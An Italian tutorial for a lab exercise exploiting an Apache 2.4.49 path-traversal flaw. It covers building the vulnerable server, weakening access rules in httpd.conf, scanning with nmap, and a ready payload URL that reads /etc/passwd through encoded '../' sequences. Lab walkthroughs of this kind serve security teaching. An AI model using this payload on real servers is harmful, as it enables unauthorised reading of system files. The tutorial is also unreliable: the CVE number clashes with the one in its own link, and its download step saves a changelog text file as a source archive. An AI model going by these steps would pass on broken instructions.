
questo è un esempio pratico di come sfruttare la vulnerabilità CVE-2021-4773 con una macchina virtuale
questo è un esempio pratico di come sfruttare la vulnerabilità CVE-2021-4773 con una macchina virtuale
per questo tutorial hai bisogno di:
quindi iniziamo quando hai due macchine virtuali in esecuzione, installerai Apache versione 2.4.49 da un repository di archivio puoi trovare la versione a questo indirizzo: https://archive.apache.org/dist/httpd/CHANGES_2.4.49
1 La prima volta nella tua macchina virtuale server devi eseguire il seguente comando:
curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2 or wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2
2 La seconda volta devi decomprimere questa versione di Apache in questo modo:
tar -xvjf httpd-2.4.49.tar.bz2
3 Installa i seguenti pacchetti:
sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev
4 Esegui il file eseguibile nella directory principale (file chiamato configure) usando il flag per specificare la directory di installazione:
./configure --prefix=/usr/local/apache2
5 Compila la versione vulnerabile:
make
6 Installa la versione vulnerabile:
make install
7 Verifica la versione:
ls /usr/local/apache2
8 Avvia il processo:
/usr/local/apache2/bin/apachectl start
9 Verifica il processo:
ps aux | grep httpd
10 Configura la vulnerabilità: Trova il file /usr/local/apache2/conf/httpd.conf e configura la directory admin Trova il tag Directory e cambia Require all denied in
Require all granted
Trova il tag Files .ht* e cambia Require all denied in
Require all granted
Il primo cambiamento serve per sfruttare la vulnerabilità nell'ambiente locale, il secondo per l'esposizione nell'ambiente reale
1 Scansiona l'indirizzo IP con nmap usando il seguente comando:
nmap -sV ip_address
2 Esegui un curl o wget per testare il server Apache:
curl ip_address or make wget ip_address
3 Consulta come sfruttare la vulnerabilità nella pagina seguente se vuoi capire la sintassi:
https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability
oppure usa direttamente il seguente payload:
http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd